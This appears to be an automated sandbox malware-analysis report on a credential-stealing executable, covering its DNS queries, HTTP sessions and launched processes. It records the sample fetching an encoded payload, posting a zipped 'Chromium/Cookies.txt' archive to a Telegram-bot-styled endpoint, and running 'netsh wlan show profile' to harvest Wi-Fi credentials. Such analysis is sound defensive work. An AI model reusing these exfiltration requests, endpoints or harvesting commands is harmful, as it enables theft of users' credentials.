                    Jun 24, 2024 16:50:55.431735039 CEST8.8.8.8192.168.2.220xc702No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:50:57.046508074 CEST8.8.8.8192.168.2.220x432cName error (3)90.168.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                    Jun 24, 2024 16:51:02.170931101 CEST8.8.8.8192.168.2.220xfe5No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:51:08.160586119 CEST8.8.8.8192.168.2.220x3d23No error (0)whatismyipaddressnow.co188.114.96.3A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:51:08.160586119 CEST8.8.8.8192.168.2.220x3d23No error (0)whatismyipaddressnow.co188.114.97.3A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:51:08.174427986 CEST8.8.8.8192.168.2.220x3d23No error (0)whatismyipaddressnow.co188.114.97.3A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:51:08.174427986 CEST8.8.8.8192.168.2.220x3d23No error (0)whatismyipaddressnow.co188.114.96.3A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • whatismyipaddressnow.co
                    • icanhazip.com
                    • ip-api.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249165104.16.185.241802036C:\Users\user\Desktop\wssvZm9dNK.exe
                    TimestampBytes transferredDirectionData
                    Jun 24, 2024 16:50:55.444897890 CEST63OUTGET / HTTP/1.1
                    Host: icanhazip.com
                    Connection: Keep-Alive
                    Jun 24, 2024 16:50:55.915349960 CEST534INHTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:50:55 GMT
                    Content-Type: text/plain
                    Content-Length: 12
                    Connection: keep-alive
                    Access-Control-Allow-Origin: *
                    Access-Control-Allow-Methods: GET
                    Set-Cookie: __cf_bm=0pjTA9jo2oJu5FKqOaC1UrdAJm5NUcuJzRzPYHTBRtc-1719240655-1.0.1.1-UaWVCoRGi_keMvqB3T5RphK12G6kvXTXqRtG87uXTw1CARwmvoBCHqe9hxh0t4FbZdDEGoEXds8.pVuvqxtzOg; path=/; expires=Mon, 24-Jun-24 15:20:55 GMT; domain=.icanhazip.com; HttpOnly
                    Server: cloudflare
                    CF-RAY: 898d887329a18c57-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                    Data Ascii: 8.46.123.33
                    Jun 24, 2024 16:50:56.124316931 CEST534INHTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:50:55 GMT
                    Content-Type: text/plain
                    Content-Length: 12
                    Connection: keep-alive
                    Access-Control-Allow-Origin: *
                    Access-Control-Allow-Methods: GET
                    Set-Cookie: __cf_bm=0pjTA9jo2oJu5FKqOaC1UrdAJm5NUcuJzRzPYHTBRtc-1719240655-1.0.1.1-UaWVCoRGi_keMvqB3T5RphK12G6kvXTXqRtG87uXTw1CARwmvoBCHqe9hxh0t4FbZdDEGoEXds8.pVuvqxtzOg; path=/; expires=Mon, 24-Jun-24 15:20:55 GMT; domain=.icanhazip.com; HttpOnly
                    Server: cloudflare
                    CF-RAY: 898d887329a18c57-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                    Data Ascii: 8.46.123.33


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249166208.95.112.1802036C:\Users\user\Desktop\wssvZm9dNK.exe
                    TimestampBytes transferredDirectionData
                    Jun 24, 2024 16:51:02.177234888 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                    Host: ip-api.com
                    Connection: Keep-Alive
                    Jun 24, 2024 16:51:02.649985075 CEST175INHTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:51:01 GMT
                    Content-Type: text/plain; charset=utf-8
                    Content-Length: 6
                    Access-Control-Allow-Origin: *
                    X-Ttl: 60
                    X-Rl: 44
                    Data Raw: 66 61 6c 73 65 0a
                    Data Ascii: false
                    Jun 24, 2024 16:51:02.864099026 CEST175INHTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:51:01 GMT
                    Content-Type: text/plain; charset=utf-8
                    Content-Length: 6
                    Access-Control-Allow-Origin: *
                    X-Ttl: 60
                    X-Rl: 44
                    Data Raw: 66 61 6c 73 65 0a
                    Data Ascii: false


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249164188.114.96.34432036C:\Users\user\Desktop\wssvZm9dNK.exe
                    TimestampBytes transferredDirectionData
                    2024-06-24 14:50:49 UTC125OUTGET /API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf HTTP/1.1
                    Host: whatismyipaddressnow.co
                    Connection: Keep-Alive
                    2024-06-24 14:50:50 UTC619INHTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:50:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hp%2B0JwZXVODrdxN3Jdf%2Bia0NCvS6uciCbEPzaZkn%2BAzwZ8M5LmS43N1LIQT%2F5n8wEBY%2BxYYCf4ziwuWKaGsKLsXXUFaFN6ukiVO5plqj3XZ1wJhbnCj00Qn6h9Lw6d1u81eDKc%2B%2F0ZtSMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 898d884e9b5fc3ff-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-06-24 14:50:50 UTC750INData Raw: 31 63 36 65 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 46 39 4a 44 73 69 44 68 43 4c 30 6e 6f 66 63 75 48 51 4a 49 4a 33 51 34 53 4f 67 6c 42 4b 53 70 46 4f 6b 4b 30 67 57 6b 43 45 67 54 45 42 46 55 78 41 59 6f 56 71 51 4a 64 68 51 55 65 34 58 2f 76 4c 6e 62 33 62 6d 64 33 62 33 64 75 66 73 64 66 7a 2f 79 7a 64 33 63 7a 74 73 33 62 39 36 38 71 65 39 4e 68 39 35 50 63 69 61 4f 34 38 7a 6f 33 2f 33 37 48 48 65 55 63 2f 33 58 6d 50 50 2b 58 77 6e 36 46 35 31 78 50 4a 6f 37 46 48 36 4f 50 78 72 55 2f 68 7a 66 62 66 69 49 6f 73 78 78 68 63 35 68 68 51 50 48 5a 41 34 65 4f 48 61 73 63 30 4c 6d 6f 49 4c 4d 77 6f 6c 6a 4d 30 65 4d 7a 57 7a 65 73 57 76 6d 47 4f 65 51 67 69 70 52 55 64 61 48 33 44 51 36 74
                    Data Ascii: 1c6eH4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvF9JDsiDhCL0nofcuHQJIJ3Q4SOglBKSpFOkK0gWkCEgTEBFUxAYoVqQJdhQUe4X/vLnb3bmd3b3dufsdfz/yzd3czts3b968qe9Nh95PciaO48zo3/37HHeUc/3XmPP+Xwn6F51xPJo7FH6OPxrU/hzfbfiIosxxhc5hhQPHZA4eOHasc0LmoILMwoljM0eMzWzesWvmGOeQgipRUdaH3DQ6t
                    2024-06-24 14:50:50 UTC1369INData Raw: 47 6e 47 33 44 38 58 4b 70 41 54 33 72 79 50 66 72 64 6d 46 2b 72 57 48 6d 39 45 45 47 5a 4f 6c 7a 49 6a 4a 53 47 41 79 32 76 52 2b 64 6f 38 45 70 61 63 6d 38 58 30 79 61 38 2b 55 53 48 72 2b 57 6a 70 34 65 67 7a 6b 4c 78 4e 73 6d 68 6e 6a 4b 75 33 30 57 43 45 68 31 70 31 67 45 78 4a 73 37 6f 51 34 49 51 46 2f 47 45 72 49 4c 39 36 54 37 77 53 6c 31 45 6e 38 4f 7a 74 47 35 30 6f 63 65 66 37 36 73 4d 6b 63 50 44 30 42 30 58 55 30 44 30 47 53 54 49 65 30 4a 61 62 67 36 59 6b 6f 71 62 42 73 46 6a 66 4f 37 45 42 35 72 63 48 54 6b 7a 79 66 6d 63 2f 50 37 62 6d 33 6a 45 53 56 72 74 52 4a 76 50 6e 56 52 6f 50 55 33 75 75 68 56 4f 2b 33 6e 6c 47 67 57 67 75 79 66 48 7a 75 6c 59 54 6d 57 75 38 64 6d 71 44 32 53 78 64 50 2b 52 53 58 42 58 48 4b 4b 37 73 45 70 30 37
                    Data Ascii: GnG3D8XKpAT3ryPfrdmF+rWHm9EEGZOlzIjJSGAy2vR+do8Epacm8X0ya8+USHr+Wjp4egzkLxNsmhnjKu30WCEh1p1gExJs7oQ4IQF/GErIL96T7wSl1En8OztG50ocef76sMkcPD0B0XU0D0GSTIe0Jabg6YkoqbBsFjfO7EB5rcHTkzyfmc/P7bm3jESVrtRJvPnVRoPU3uuhVO+3nlGgWguyfHzulYTmWu8dmqD2SxdP+RSXBXHKK7sEp07
                    2024-06-24 14:50:50 UTC1369INData Raw: 32 65 4e 76 4e 6c 53 2b 6c 72 38 47 32 4b 6b 35 42 31 33 58 2f 53 75 30 42 65 39 36 30 34 34 4a 79 53 63 63 79 65 63 46 78 4c 4f 75 78 4d 75 43 41 6b 58 33 41 6e 76 43 51 6e 76 75 63 66 55 66 38 57 6a 41 54 54 36 34 58 33 68 68 2f 66 64 54 31 34 55 45 69 36 36 45 7a 34 51 45 76 43 48 49 38 45 6d 78 78 6f 51 41 70 63 35 34 42 59 71 56 6e 35 43 4c 2b 63 30 2b 44 35 68 44 78 72 33 45 49 6c 50 42 65 48 78 72 61 4d 33 6c 44 63 76 32 50 45 30 2b 6f 36 49 66 41 68 45 61 67 52 50 68 37 2f 4f 74 66 43 4d 38 47 55 64 2b 65 55 5a 38 73 74 71 6a 76 69 79 48 6e 36 70 34 2f 70 69 63 6d 34 67 6e 39 75 49 71 38 50 39 6b 7a 6e 45 75 63 62 31 61 76 64 33 35 79 61 50 6e 4a 74 6c 44 32 2b 42 37 79 33 64 33 78 4e 4d 53 30 61 34 55 67 71 46 74 74 68 34 54 39 49 6a 52 41 31 39
                    Data Ascii: 2eNvNlS+lr8G2Kk5B13X/Su0Be96044JySccyecFxLOuxMuCAkX3AnvCQnvucfUf8WjATT64X3hh/fdT14UEi66Ez4QEvCHI8EmxxoQApc54BYqVn5CL+c0+D5hDxr3EIlPBeHxraM3lDcv2PE0+o6IfAhEagRPh7/OtfCM8GUd+eUZ8stqjviyHn6p4/picm4gn9uIq8P9kznEucb1avd35yaPnJtlD2+B7y3d3xNMS0a4UgqFtth4T9IjRA19
                    2024-06-24 14:50:50 UTC1369INData Raw: 67 47 53 48 45 2f 4b 38 2b 46 31 2b 69 63 53 50 7a 57 4b 4d 79 35 6d 30 51 59 50 4a 54 47 75 64 62 77 4c 49 37 53 41 42 6b 41 6d 51 6f 6b 30 41 2f 57 30 48 42 6e 4a 75 77 58 75 4c 4b 48 77 77 4d 38 51 42 6d 41 73 67 41 50 41 5a 52 54 34 63 43 42 42 73 34 57 6b 67 45 72 50 4a 4d 46 55 42 37 41 41 56 41 42 49 46 73 58 41 78 48 77 51 45 57 41 53 67 43 56 41 61 6f 41 56 4e 58 4c 51 43 51 38 55 77 32 67 4f 6b 41 4e 67 4a 6f 41 74 58 51 78 45 41 55 50 31 41 61 6f 41 31 41 58 49 41 63 67 56 79 38 44 30 66 42 4d 48 6b 41 39 67 50 6f 41 44 51 41 61 36 6d 49 67 42 68 35 6f 42 4e 41 59 6f 41 6c 41 55 34 42 6d 65 68 6d 49 68 57 65 61 41 37 51 41 61 41 6e 51 43 71 43 31 43 67 4e 32 73 38 30 4d 74 57 37 4e 58 51 51 74 78 4a 79 63 6d 46 78 55 42 74 4a 44 50 44 69 7a 51
                    Data Ascii: gGSHE/K8+F1+icSPzWKMy5m0QYPJTGudbwLI7SABkAmQok0A/W0HBnJuwXuLKHwwM8QBmAsgAPAZRT4cCBBs4WkgErPJMFUB7AAVABIFsXAxHwQEWASgCVAaoAVNXLQCQ8Uw2gOkANgJoAtXQxEAUP1AaoA1AXIAcgVy8D0fBMHkA9gPoADQAa6mIgBh5oBNAYoAlAU4BmehmIhWeaA7QAaAnQCqC1CgN2s80MtW7NXQQtxJycmFxUBtJDPDizQ
                    2024-06-24 14:50:50 UTC1369INData Raw: 31 4e 6b 52 4c 6d 70 59 5a 4a 57 69 52 78 38 46 53 6c 64 45 56 72 56 42 6c 38 72 71 6e 61 34 79 68 44 66 47 33 77 2b 7a 45 6f 6c 6f 43 51 37 32 49 42 52 71 69 4a 58 53 71 72 75 6a 71 39 4b 55 4e 72 61 31 5a 6b 64 69 39 30 72 52 7a 74 4c 42 31 74 52 6a 56 70 6c 63 67 31 53 4e 56 32 54 36 31 49 54 51 69 35 55 49 39 79 30 6d 4f 2f 61 30 35 65 50 33 64 41 68 52 4e 6d 4b 49 56 7a 57 67 38 79 4d 46 4b 43 4a 66 5a 47 57 48 6d 50 67 36 57 50 44 41 4b 59 38 4d 4f 4e 50 30 45 6f 37 53 68 30 38 6e 63 6a 47 6c 76 4a 6d 6d 33 63 64 4f 57 74 52 33 64 64 47 63 43 33 55 63 78 33 55 64 4a 75 72 33 63 64 50 6b 50 4f 6e 78 4e 4c 47 6e 79 76 53 76 38 50 4a 57 6f 66 35 2f 66 30 38 54 39 48 6d 48 63 64 6d 52 41 70 38 48 47 36 57 63 4d 45 2b 6a 6c 65 73 72 44 6f 4a 77 7a 75 67
                    Data Ascii: 1NkRLmpYZJWiRx8FSldEVrVBl8rqna4yhDfG3w+zEoloCQ72IBRqiJXSqrujq9KUNra1Zkdi90rRztLB1tRjVplcg1SNV2T61ITQi5UI9y0mO/a05eP3dAhRNmKIVzWg8yMFKCJfZGWHmPg6WPDAKY8MONP0Eo7Sh08ncjGlvJmm3cdOWtR3ddGcC3Ucx3UdJur3cdPkPOnxNLGnyvSv8PJWof5/f08T9HmHcdmRAp8HG6WcME+jlesrDoJwzug
                    2024-06-24 14:50:50 UTC1060INData Raw: 65 39 65 78 7a 63 4b 77 7a 69 36 30 72 53 39 62 76 6b 59 73 4f 2f 6a 65 4c 34 6e 6a 6f 2b 4c 77 4f 34 54 48 48 74 38 39 66 36 6d 46 35 54 31 6a 51 45 64 58 34 50 65 73 34 4c 79 4d 6a 30 36 6e 6a 38 68 67 65 59 66 61 47 45 78 75 4a 37 64 4d 4f 63 64 41 50 79 4e 43 62 74 65 46 65 63 4c 49 6d 32 65 73 4c 50 7a 43 4f 52 63 4d 2b 52 68 46 32 63 2f 6c 56 4d 5a 7a 32 50 45 52 6b 30 6f 41 5a 61 73 49 70 32 63 71 41 56 53 47 55 32 78 77 30 44 4d 4a 76 53 72 5a 72 63 50 59 6c 7a 63 37 42 61 57 41 4b 73 4c 45 48 73 34 55 57 70 31 56 45 53 52 62 5a 66 79 6c 65 50 43 33 42 76 46 58 57 41 71 79 41 7a 39 50 4b 74 52 52 72 7a 64 50 31 2f 59 6f 73 34 73 33 2b 74 31 71 33 4f 61 36 75 57 58 6a 72 62 7a 41 32 79 4a 5a 33 62 37 7a 62 75 2f 53 43 6e 77 46 53 6d 62 56 42 62 36
                    Data Ascii: e9exzcKwzi60rS9bvkYsO/jeL4njo+LwO4THHt89f6mF5T1jQEdX4Pes4LyMj06nj8hgeYfaGExuJ7dMOcdAPyNCbteFecLIm2esLPzCORcM+RhF2c/lVMZz2PERk0oAZasIp2cqAVSGU2xw0DMJvSrZrcPYlzc7BaWAKsLEHs4UWp1VESRbZfylePC3BvFXWAqyAz9PKtRRrzdP1/Yos4s3+t1q3Oa6uWXjrbzA2yJZ3b7zbu/SCnwFSmbVBb6
                    2024-06-24 14:50:50 UTC1369INData Raw: 32 64 30 32 0d 0a 71 47 56 50 44 59 54 53 56 74 49 51 65 70 51 41 65 45 6e 43 71 6b 42 71 50 55 58 48 43 6d 54 58 4d 4c 46 36 63 47 77 62 50 77 43 64 71 2f 4d 4c 39 33 6f 4b 5a 72 53 5a 64 58 69 4f 66 61 7a 77 42 58 68 58 69 63 71 31 37 37 33 51 76 45 75 67 6e 74 68 30 41 66 64 68 59 58 41 68 37 6e 66 44 70 58 72 63 4e 2f 51 66 2b 35 36 6a 73 63 74 45 52 55 6e 6b 6c 6a 56 68 45 4f 71 42 34 2b 4f 58 45 35 72 2b 4d 79 78 58 6d 38 4a 77 34 6c 65 4c 49 43 4b 62 4a 46 45 6b 6a 79 4c 42 4f 6b 65 4d 6f 47 55 6a 78 4c 43 53 6d 6b 5a 4f 43 37 4b 4c 30 6e 58 4e 4b 44 4e 4c 77 49 67 74 38 57 62 59 2f 4e 73 4f 49 30 6f 75 6a 34 45 61 74 48 32 65 74 43 32 57 4f 7a 50 64 65 44 2b 4a 41 7a 31 32 71 72 6c 46 33 6a 62 4b 7a 33 30 38 77 4b 4b 30 62 30 73 70 4b 4f 4d 35 5a
                    Data Ascii: 2d02qGVPDYTSVtIQepQAeEnCqkBqPUXHCmTXMLF6cGwbPwCdq/ML93oKZrSZdXiOfazwBXhXicq1773QvEugnth0AfdhYXAh7nfDpXrcN/Qf+56jsctERUnkljVhEOqB4+OXE5r+MyxXm8Jw4leLICKbJFEkjyLBOkeMoGUjxLCSmkZOC7KL0nXNKDNLwIgt8WbY/NsOI0ouj4EatH2etC2WOzPdeD+JAz12qrlF3jbKz308wKK0b0spKOM5Z
                    2024-06-24 14:50:50 UTC1369INData Raw: 67 41 50 41 5a 52 54 49 50 69 63 44 6f 4b 37 49 55 73 57 5a 43 34 50 34 41 43 6f 41 4a 43 74 51 48 43 58 44 6f 4a 37 49 45 74 46 79 46 77 4a 6f 44 4a 41 46 59 43 71 43 67 52 33 36 79 44 34 50 47 53 70 42 70 6d 72 41 39 51 41 71 41 6c 51 53 34 48 67 48 67 32 43 37 71 42 6e 4d 41 61 42 42 55 30 38 6a 6d 79 58 76 34 2f 59 6e 7a 63 34 2f 79 78 43 30 78 46 78 59 36 45 32 63 4a 4d 50 30 41 75 67 4e 30 41 66 67 45 64 6f 4e 6c 33 52 38 5a 31 74 69 65 78 31 34 4b 6d 2b 41 50 30 41 2b 67 4d 4d 41 42 68 49 5a 33 66 6c 36 46 47 4b 63 38 56 78 63 37 59 44 49 49 6e 56 68 54 79 44 41 41 59 44 44 41 45 6f 41 42 69 71 52 71 79 74 4f 72 45 63 79 44 4d 4d 59 44 6a 41 43 49 43 52 41 4b 50 55 69 4f 57 6f 45 38 75 46 50 4b 4d 42 78 67 43 4d 42 58 41 43 6a 4e 4d 6c 70 54 78 34
                    Data Ascii: gAPAZRTIPicDoK7IUsWZC4P4ACoAJCtQHCXDoJ7IEtFyFwJoDJAFYCqCgR36yD4PGSpBpmrA9QAqAlQS4HgHg2C7qBnMAaBBU08jmyXv4/Ynzc4/yxC0xFxY6E2cJMP0AugN0AfgEdoNl3R8Z1tiex14Km+AP0A+gMMABhIZ3fl6FGKc8Vxc7YDIInVhTyDAAYDDAEoABiqRqytOrEcyDMMYDjACICRAKPUiOWoE8uFPKMBxgCMBXACjNMlpTx4
                    2024-06-24 14:50:50 UTC1369INData Raw: 41 50 55 41 61 67 4c 4d 42 44 43 76 51 36 49 63 69 74 68 57 5a 44 70 61 4e 63 42 77 47 68 74 57 54 44 32 54 2b 38 4f 65 52 53 59 36 76 38 36 46 35 47 6c 4d 64 73 61 76 32 2f 77 6e 6b 6d 45 2f 65 33 43 63 65 49 6c 5a 38 2f 69 38 77 70 67 74 78 68 4f 47 63 4b 79 43 37 2b 6e 71 56 78 4b 47 63 70 36 6f 77 34 4b 4f 6f 43 44 43 48 4c 61 73 32 49 6a 6b 51 50 78 52 49 50 32 63 4c 6f 68 32 7a 6f 49 57 41 32 32 66 33 4d 65 67 76 31 54 42 72 51 43 53 66 6f 76 45 73 2f 6b 32 47 46 68 36 4c 52 51 2b 43 53 61 79 6c 47 70 54 57 58 79 34 4e 4c 4c 4c 4b 4b 34 64 71 2b 65 35 59 6c 77 65 35 4d 35 55 72 67 52 79 4a 72 44 47 53 4e 49 65 68 62 54 54 54 39 57 50 52 51 47 73 46 6e 73 78 44 71 6d 58 53 67 59 79 58 6f 6f 42 64 54 64 43 4c 67 6f 51 6a 69 6f 56 79 61 55 45 59 6b 65
                    Data Ascii: APUAagLMBDCvQ6IcithWZDpaNcBwGhtWTD2T+8OeRSY6v86F5GlMdsav2/wnkmE/e3CceIlZ8/i8wpgtxhOGcKyC7+nqVxKGcp6ow4KOoCDCHLas2IjkQPxRIP2cLoh2zoIWA22f3Megv1TBrQCSfovEs/k2GFh6LRQ+CSaylGpTWXy4NLLLKK4dq+e5Ylwe5M5UrgRyJrDGSNIehbTTT9WPRQGsFnsxDqmXSgYyXooBdTdCLgoQjioVyaUEYke
                    2024-06-24 14:50:50 UTC1369INData Raw: 38 36 54 76 4b 64 65 39 48 68 4f 6a 53 39 4e 30 53 2b 65 38 52 72 48 46 70 67 66 63 77 50 57 77 65 58 67 62 71 36 42 42 48 33 52 50 45 44 2b 6e 36 52 78 68 5a 54 72 47 65 78 46 4c 31 31 46 6f 46 38 58 37 35 68 78 2f 58 52 63 52 32 4e 44 7a 79 4f 6e 47 46 5a 59 49 4f 2b 36 38 72 33 70 4c 47 61 44 70 66 71 2b 46 51 64 65 4c 44 58 46 76 30 49 36 78 77 34 41 77 52 79 31 4f 33 7a 77 64 64 4b 68 32 54 42 6a 6d 2f 47 76 31 6e 4c 79 31 42 4d 4b 77 42 71 66 58 6c 71 6e 30 63 33 61 50 52 76 5a 36 4f 48 6b 33 72 44 69 36 57 50 6b 34 2b 74 78 30 2f 5a 76 52 41 52 66 75 68 34 37 6f 66 50 57 73 2b 33 69 65 4c 43 73 6f 68 46 72 45 50 30 39 68 54 75 47 64 4d 61 56 32 53 74 68 75 50 53 48 5a 44 62 68 4e 30 33 48 66 69 7a 33 76 47 78 48 6b 62 62 37 33 61 53 36 6f 55 76 73
                    Data Ascii: 86TvKde9HhOjS9N0S+e8RrHFpgfcwPWweXgbq6BBH3RPED+n6RxhZTrGexFL11FoF8X75hx/XRcR2NDzyOnGFZYIO+68r3pLGaDpfq+FQdeLDXFv0I6xw4AwRy1O3zwddKh2TBjm/Gv1nLy1BMKwBqfXlqn0c3aPRvZ6OHk3rDi6WPk4+tx0/ZvRARfuh47ofPWs+3ieLCsohFrEP09hTuGdMaV2SthuPSHZDbhN03Hfiz3vGxHkbb73aS6oUvs


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249167188.114.97.34432036C:\Users\user\Desktop\wssvZm9dNK.exe
                    TimestampBytes transferredDirectionData
                    2024-06-24 14:51:08 UTC202OUTPOST /API/FETCH/getcountry.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638548738767882883
                    Host: whatismyipaddressnow.co
                    Content-Length: 5169
                    Connection: Keep-Alive
                    2024-06-24 14:51:08 UTC1024OUTData Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 34 38 37 33 38 37 36 37 38 38 32 38 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 53 33 46 6f 52 43 39 42 53 58 63 78 64 57 70 73 5a 6e 6b 35 64 48 4d 33 59 6c 70 4b 51 54 30 39 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 34 38 37 33 38 37 36 37 38 38 32 38 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 58 52 4b 65 46 70 7a 59 54 55 72 54 31 68 71 63 32 51 34 59 30 78 55 5a 33 64 4c 5a 32 6c 70 63 44 4a 73 52 47 55 76 54 31 4e
                    Data Ascii: -----TelegramBotAPI_638548738767882883Content-Disposition: form-data; name="chat_id"S3FoRC9BSXcxdWpsZnk5dHM3YlpKQT09-----TelegramBotAPI_638548738767882883Content-Disposition: form-data; name="token"aXRKeFpzYTUrT1hqc2Q4Y0xUZ3dLZ2lpcDJsRGUvT1N
                    2024-06-24 14:51:08 UTC4101OUTData Raw: 00 7c 04 d9 58 8d 1b b2 c8 8e 02 00 00 d7 04 00 00 14 00 00 00 43 68 72 6f 6d 69 75 6d 2f 43 6f 6f 6b 69 65 73 2e 74 78 74 a5 53 cb 6e a3 48 14 5d 57 4b fd 25 23 7b aa a8 17 15 c9 8b 32 60 4c 30 6f 70 9c 6c 10 6f 1c db 10 bb 4d 08 fe fa f1 b4 7a 31 ab 44 9a 1c dd cd dd 5c 9d c7 3d f3 a6 ef 9b 63 35 2f fa 13 88 c3 c4 00 7f 83 95 dc 44 06 40 18 0b 01 29 c2 0a 83 42 c1 48 00 cd 73 23 c3 8d 81 6f b8 ba e5 9a 7f 09 a6 fc fc b1 f8 0c 3f 7f cc 3f 39 cf 21 82 1c 13 15 22 8a 09 03 91 a7 45 40 93 46 b4 96 8d 66 b4 8f 5d 89 dd da 79 95 93 73 93 c4 d1 8d ab b3 12 51 70 73 32 79 da 0e 96 34 b2 65 b3 97 7b 35 3b 2d 9b 2f 69 8c e3 f8 19 13 ac 52 8e 08 a1 f0 37 80 17 bf 00 7e 27 85 19 49 d5 fb a8 29 82 44 51 e1 bf 0b 21 4c 10 f8 2d dd 77 4f 29 15 90 71 c4 b8 8a 80 34 34
                    Data Ascii: |XChromium/Cookies.txtSnH]WK%#{2`L0oploMz1D\=c5/D@)BHs#o??9!"E@Ff]ysQps2y4e{5;-/iR7~'I)DQ!L-wO)q44
                    2024-06-24 14:51:08 UTC44OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 34 38 37 33 38 37 36 37 38 38 32 38 38 33 2d 2d 0d 0a
                    Data Ascii: -----TelegramBotAPI_638548738767882883--
                    2024-06-24 14:51:09 UTC572INHTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:51:09 GMT
                    Content-Type: application/json
                    Content-Length: 20
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qy03G5UYMKSOKc3%2FpY68GhiWId0%2B0yBKgmjMo8jP4DNhn3ldz0SlPBzPbAORBuz7E3lYvzXTfJ8fukbfZ6HKsmhJ0kLlc6nSs7cv8t33TR6%2FUKlIfmC8REArm4lkD0rNSNQIQFpSCvNjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 898d88c4fbb55e60-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-06-24 14:51:09 UTC20INData Raw: 43 6f 75 6e 74 72 79 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e
                    Data Ascii: Country not defined.


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:10:50:45
                    Start date:24/06/2024
                    Path:C:\Users\user\Desktop\wssvZm9dNK.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\wssvZm9dNK.exe"
                    Imagebase:0x230000
                    File size:57'856 bytes
                    MD5 hash:2C5697F085B66BEC06E28ED6D24EC606
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:10:50:53
                    Start date:24/06/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Imagebase:0x49f10000
                    File size:302'592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:10:50:54
                    Start date:24/06/2024
                    Path:C:\Windows\SysWOW64\chcp.com
                    Wow64 process (32bit):true
                    Commandline:chcp 65001
                    Imagebase:0x340000
                    File size:11'776 bytes
                    MD5 hash:4436B1A16BDC58D2B3A5263F042C09B3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:5
                    Start time:10:50:54
                    Start date:24/06/2024
                    Path:C:\Windows\SysWOW64\netsh.exe
                    Wow64 process (32bit):true
                    Commandline:netsh wlan show profile
                    Imagebase:0x1490000
                    File size:96'256 bytes
                    MD5 hash:784A50A6A09C25F011C3143DDD68E729
                    Has elevated privileges:true
                    Has administrator privileges:true
